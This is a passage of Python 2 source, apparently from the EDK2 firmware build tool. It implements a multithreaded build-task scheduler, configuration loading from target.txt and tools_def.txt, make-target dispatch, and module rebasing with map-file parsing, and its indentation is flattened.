# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other != None and self.BuildObject == Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise make units
# could be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise make units
# could be missed during the build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = sdict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = sdict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = sdict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, to avoid duplicate builds
_TaskQueue = sdict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which exits when there are no pending/ready tasks and it has
# been told to do so, or when there is an error in a running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo = BuildTask._ReadyQueue.keys()[0]
Bt = BuildTask._ReadyQueue.pop(Bo)
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid a tight loop
time.sleep(0.01)
# avoid a tight loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join([Th.getName() for Th in threading.enumerate()]))
# avoid a tight loop
time.sleep(0.1)
except BaseException, X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running methods to exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions raised in other threads, we have to
# use a threading.Event to communicate this information to the main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions raised in other threads, we have to
# use a static variable to communicate this message to the main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
## The real constructor of BuildTask
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
def _Init(self, BuildItem, Dependency=None):
self.BuildItem = BuildItem
self.DependencyList = []
if Dependency == None:
Dependency = BuildItem.Dependency
else:
Dependency.extend(BuildItem.Dependency)
self.AddDependency(Dependency)
# flag indicating build completes, used to avoid unnecessary re-build
self.CompleteFlag = False
## Check if all dependent build tasks are completed or not
#
def IsReady(self):
ReadyFlag = True
for Dep in self.DependencyList:
if Dep.CompleteFlag == True:
continue
ReadyFlag = False
break
return ReadyFlag
## Add dependent build task
#
# @param Dependency The list of dependent build objects
#
def AddDependency(self, Dependency):
for Dep in Dependency:
if not Dep.BuildObject.IsBinaryModule:
self.DependencyList.append(BuildTask.New(Dep)) # BuildTask list
## The thread wrapper of LaunchCommand function
#
# @param Command A list or string contains the call of the command
# @param WorkingDir The directory in which the program will be running
#
def _CommandThread(self, Command, WorkingDir):
try:
LaunchCommand(Command, WorkingDir)
self.CompleteFlag = True
except:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
if not BuildTask._ErrorFlag.isSet():
GlobalData.gBuildingModule = "%s [%s, %s, %s]" % (str(self.BuildItem.BuildObject),
self.BuildItem.BuildObject.Arch,
self.BuildItem.BuildObject.ToolChain,
self.BuildItem.BuildObject.BuildTarget
)
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "%s broken\n %s [%s]" % \
(threading.currentThread().getName(), Command, WorkingDir)
# indicate that a thread is available for another build task
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue.pop(self.BuildItem)
BuildTask._RunningQueueLock.release()
BuildTask._Thread.release()
## Start build task thread
#
def Start(self):
EdkLogger.quiet("Building ... %s" % repr(self.BuildItem))
Command = self.BuildItem.BuildCommand + [self.BuildItem.Target]
self.BuildTread = Thread(target=self._CommandThread, args=(Command, self.BuildItem.WorkingDir))
self.BuildTread.setName("build thread")
self.BuildTread.setDaemon(False)
self.BuildTread.start()
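# Illustrative sketch (not part of the original file): roughly how the scheduler above is
# driven. The error handling and the list of modules are placeholders.
#
#   ExitFlag = Event()
#   ExitFlag.clear()
#   BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
#   for Mod in ModuleAutoGenList:                       # hypothetical list of ModuleAutoGen objects
#       BuildTask.New(ModuleMakeUnit(Mod, self.Target)) # queued until its dependencies complete
#   ExitFlag.set()                                      # let the scheduler stop once the queues drain
#   BuildTask.WaitForComplete()
#   if BuildTask.HasError():
#       EdkLogger.error("build", COMMAND_FAILURE, BuildTask.GetErrorMessage())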
## The class contains the information related to EFI image
#
class PeImageInfo():
## Constructor
#
# Constructor will load all required image information.
#
# @param BaseName The full file path of image.
# @param Guid The GUID for image.
# @param Arch Arch of this image.
# @param OutputDir The output directory for image.
# @param DebugDir The debug directory for image.
# @param ImageClass PeImage Information
#
def __init__(self, BaseName, Guid, Arch, OutputDir, DebugDir, ImageClass):
self.BaseName = BaseName
self.Guid = Guid
self.Arch = Arch
self.OutputDir = OutputDir
self.DebugDir = DebugDir
self.Image = ImageClass
self.Image.Size = (self.Image.Size / 0x1000 + 1) * 0x1000
## The class implementing the EDK2 build process
#
# The build process includes:
# 1. Load configuration from target.txt and tools_def.txt in $(WORKSPACE)/Conf
# 2. Parse DSC file of active platform
# 3. Parse FDF file if any
# 4. Establish build database, including parse all other files (module, package)
# 5. Create AutoGen files (C code file, depex file, makefile) if necessary
# 6. Call build command
#
class Build():
## Constructor
#
# Constructor will load all necessary configurations, parse platform, modules
# and packages, and then establish a database for AutoGen.
#
# @param Target The build command target, one of gSupportedTarget
# @param WorkspaceDir The directory of workspace
# @param BuildOptions Build options passed from command line
#
def __init__(self, Target, WorkspaceDir, BuildOptions):
self.WorkspaceDir = WorkspaceDir
self.Target = Target
self.PlatformFile = BuildOptions.PlatformFile
self.ModuleFile = BuildOptions.ModuleFile
self.ArchList = BuildOptions.TargetArch
self.ToolChainList = BuildOptions.ToolChain
self.BuildTargetList= BuildOptions.BuildTarget
self.Fdf = BuildOptions.FdfFile
self.FdList = BuildOptions.RomImage
self.FvList = BuildOptions.FvImage
self.CapList = BuildOptions.CapName
self.SilentMode = BuildOptions.SilentMode
self.ThreadNumber = BuildOptions.ThreadNumber
self.SkipAutoGen = BuildOptions.SkipAutoGen
self.Reparse = BuildOptions.Reparse
self.SkuId = BuildOptions.SkuId
self.ConfDirectory = BuildOptions.ConfDirectory
self.SpawnMode = True
self.BuildReport = BuildReport(BuildOptions.ReportFile, BuildOptions.ReportType)
self.TargetTxt = TargetTxtClassObject()
self.ToolDef = ToolDefClassObject()
#Set global flag for build mode
GlobalData.gIgnoreSource = BuildOptions.IgnoreSources
if self.ConfDirectory:
# Get the alternate Conf location; if it is absolute, just use the absolute directory name
ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
if not os.path.isabs(ConfDirectoryPath):
# Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
# This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, ConfDirectoryPath)
else:
# Get the standard WORKSPACE/Conf, using the absolute path to WORKSPACE/Conf
ConfDirectoryPath = os.path.join(self.WorkspaceDir, 'Conf')
GlobalData.gConfDirectory = ConfDirectoryPath
GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
if BuildOptions.DisableCache:
self.Db = WorkspaceDatabase(":memory:")
else:
self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
self.BuildDatabase = self.Db.BuildObject
self.Platform = None
self.LoadFixAddress = 0
self.UniFlag = BuildOptions.Flag
self.BuildModules = []
# print a dot character while doing some time-consuming work
self.Progress = Utils.Progressor()
self.InitBuild()
# print current build environment and configuration
EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
EdkLogger.info("")
os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
def LoadConfiguration(self):
#
# Check target.txt and tools_def.txt and Init them
#
BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
if os.path.isfile(BuildConfigurationFile) == True:
StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
if ToolDefinitionFile == '':
ToolDefinitionFile = gToolsDefinition
ToolDefinitionFile = os.path.normpath(os.path.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
if os.path.isfile(ToolDefinitionFile) == True:
StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
else:
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
# if no ARCH given in command line, get it from target.txt
if not self.ArchList:
self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
self.ArchList = tuple(self.ArchList)
# if no build target given in command line, get it from target.txt
if not self.BuildTargetList:
self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
# if no tool chain given in command line, get it from target.txt
if not self.ToolChainList:
self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList == None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
if self.ThreadNumber == None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
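# --- Illustrative sketch, not part of the original build tool ---
# LoadConfiguration() above delegates the actual parsing of Conf/target.txt to
# TargetTxtClassObject.  As a rough idea of the "KEY = VALUE" format that file
# uses, a minimal stand-alone parser could look like the sketch below; the
# function name and the comment/blank-line handling are assumptions made here
# purely for illustration.
def _parse_target_txt_sketch(path):
    settings = {}
    with open(path, 'r') as conf:
        for line in conf:
            line = line.strip()
            if not line or line.startswith('#'):
                continue                      # skip blank lines and comments
            if '=' not in line:
                continue                      # ignore malformed lines
            key, value = line.split('=', 1)
            settings[key.strip()] = value.strip()
    return settings
# Example: _parse_target_txt_sketch('Conf/target.txt').get('TARGET_ARCH', '')
# would return the raw, space-separated architecture list before any splitting.
# ----------------------------------------------------------------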
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive matching for values from the command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
self.Db.InitDatabase()
## Build a module or platform
#
# Create AutoGen code and a makefile for a module or platform, and then launch
# the "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for the cleanxxx, run and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create AutoGen code and a makefile for a module or platform, and then launch
# the "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for the cleanxxx, run and fds targets
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
InfFileNameList = ModuleList.keys()
#InfFileNameList.sort()
for InfFile in InfFileNameList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function addresses from the Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open (ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred load address set at link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] =='F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add GUID and general section information.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function addresses
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
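# --- Illustrative sketch, not part of the original build tool ---
# _RebaseModule() above recovers function addresses by scanning the linker map
# file for the "Preferred load address is" line and for rows whose fourth
# column is 'f' or 'F'.  A condensed version of just that scan, written here
# only to make the parsed format easier to see (the assumed column layout is
# taken from the loop above):
def _scan_map_for_functions_sketch(map_path):
    preferred_base = 0
    functions = []
    with open(map_path, 'r') as map_file:
        for line in map_file:
            words = line.split()
            if 'Preferred load address is' in line and words:
                preferred_base = int(words[-1], 16)   # base chosen at link time
            elif len(words) > 4 and words[3] in ('f', 'F'):
                # words[1] is the symbol name, words[2] its absolute address
                functions.append((words[1], int(words[2], 16) - preferred_base))
    return functions
# ----------------------------------------------------------------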
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
